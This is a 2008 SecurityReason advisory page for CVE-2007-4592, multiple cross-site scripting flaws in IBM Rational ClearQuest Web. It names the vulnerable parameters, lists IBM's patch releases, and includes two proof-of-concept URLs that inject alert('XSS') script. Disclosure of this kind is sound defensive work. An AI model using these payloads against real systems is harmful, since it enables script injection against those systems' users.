Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : IBM Rational ClearQuest Web Multiple XSS Vulnerabilities
  SecurityAlert : 3753
  CVE : CVE-2007-4592
  SecurityRisk : Low  alert  (About)
  Remote Exploit : Yes
  Local Exploit : No
  Exploit Given : Yes
  Credit : sasquatch
  Published : 20.03.2008

  Affected Software : IBM Rational ClearQuest Web



  Advisory Text :  

IBM Rational ClearQuest Web Multiple XSS

CVE-2007-4592

Discovered on 07-24-07 by sasquatch of SecureState - www.securestate.com

Multiple cross site scripting vulnerabilities exist within IBM's Rational
ClearQuest Web interface.

VULNERABLE VARIABLES:

=====================

contextid (query string parameter)

schema (query string parameter)

userNameVal ("User Name" text box)

POC URL:
http://www.website.com/cqweb/login?/cqweb/main?command=GenerateMainFrame
&service=CQ&schema=SCHEMAHERE";
alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');//

VULNERABLE VARIABLE:

====================

username (query string parameter)

POC URL:
http://www.website.com/cqweb/login?targetUrl=/cqweb/main?command=Generat
eMainFrame&ratl_userdb=DBHERE,&test=&clientServerAddress=http://www.webs
ite.com/cqweb/login&username=test</script><script>alert('xss')</script>&
password=test&schema=SCHEMAHERE&userDb=DBHERE

VENDOR RESPONSE:

================

Test fixes are now available from IBM Rational Support for versions
2003.06.16 Patch 2007C, 7.0.0.1_iFix04, and 7.0.1.0_iFix01.

These are the latest available patch releases before December 19, 2007.

Test fixes will be made available from IBM Rational Support some time in
January 2008 for versions 2003.06.16 Patch 2007D, 7.0.0.2, and 7.0.1.1.

These patch releases became available on December 19, 2007 but there was no
time to fix this vulnerability in these releases.

For this reason, we will provide test fixes that do fix it some time in the
middle or latter half of January 2008.

The following patch releases will fix this vulnerability: 2003.06.16 Patch
2008A, 7.0.0.2_iFix01, and 7.0.1.1_iFix01.

These patch releases were made available on March 4th, 2008.

Test fixes are only available by calling IBM Rational Support, which then
provides them to customers.

Patch releases are available via download. Please contact IBM Rational
Support for detailed information.





  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

» Apache-SSL memory
   disclosure

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.